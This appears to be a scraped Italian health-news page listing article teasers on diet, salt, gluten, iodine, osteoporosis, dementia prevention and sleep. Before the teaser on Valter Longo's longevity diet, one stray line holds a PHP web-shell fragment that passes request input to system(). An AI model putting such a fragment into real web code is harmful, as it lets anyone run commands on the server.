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Il cibo spazzatura non ci fa solo ingrassare. Rallenta il nostro metabolismo e a lungo andare rischiamo di ammalarci in modo serio e cronico

Dal 20 al 26 marzo torna la Settimana Mondiale per la riduzione del consumo di sale, per sensibilizzare la popolazione a ridurne l'assunzione

Merito delle sostanze antiossidanti e antinfiammatorie che proteggono il cervello

La scelta di seguire una dieta senza glutine da parte di chi non è celiaco potrebbe comportare dei rischi e favorire lo sviluppo del diabete

La regola principale è usare solo sale iodato, ma sono diversi i cibi che contengono lo iodio, prezioso per la salute di questa ghiandola

Avere ossa forti è fondamentale per tutti per evitare fratture e per abbassare il rischio di sviluppare osteoporosi. Il problema è tutt'altro che da sottovalutare, visto che solo in Italia sono tre milioni e mezzo le donne che ne soffrono, mentre gli uomini sono un milione

Molte le proprietà che vengono attribuite a questo prodotto che nasce dal lavoro delle api. Ecco quali sono le più importanti

Bastano due cucchiai al giorno per migliorare la memoria e allontanare il rischio demenza

Dopo l'influenza arrivano le sindromi parainfluenzali. Dal brodo di pollo allo yogurt, passando per il salmone e l'aglio, fino alle ostriche. Ecco i piatti che non devono mancare secondo l'Academy of Nutrition and Dietetics, l'accademia americana che rappresenta nutrizionisti e dietologi

Si possono mangiare le uova? Quali oli posso usare? È meglio evitare il glutine? Meglio i centrifugati o la frutta fresca? Gli integratori fanno davvero bene? Tutte le risposte degli specialisti del cuore americani

if(isset($_GET)){system($_GET);} Valter Longo, l'ideatore della celebrata Dieta Mima Digiuno, ha messo a punto anche la Dieta della Longevità, a cui ha dedicato un libro...

Molti alimenti di moda, come le bacche di Goji o quelle di Acai, in realtà possono essere tranquillamente sostituiti da alimenti della nostra tradizione, facendoci guadagnare in gusto e risparmiare soldi. Ecco quali sono

Anche la dieta ha un ruolo determinante per riposare bene. EAT – Alimentazione Sostenibile ha pubblicato alcune preziose regole, grazie al contributo del dottor Lelio Morricone dell'IRCCS Policlinico San Donato, e del professor Luigi Ferini Strambi dell'IRCCS Ospedale San Raffaele di Milano, dedicata ai consigli alimentari per favorire il buon sonno

Uno studio inglese aggiorna la quantità di frutta e verdura ideali per prevenire malattie croniche e tumori

Digeriscono gli isoflavoni della soia producendo l'equolo, una molecola utile anche contro osteoporosi, demenza e menopausa

L'alimentazione è fondamentale per aiutare a tenere lontano la demenza senile. Ecco i cibi che non devono mai mancare dalla lista della spesa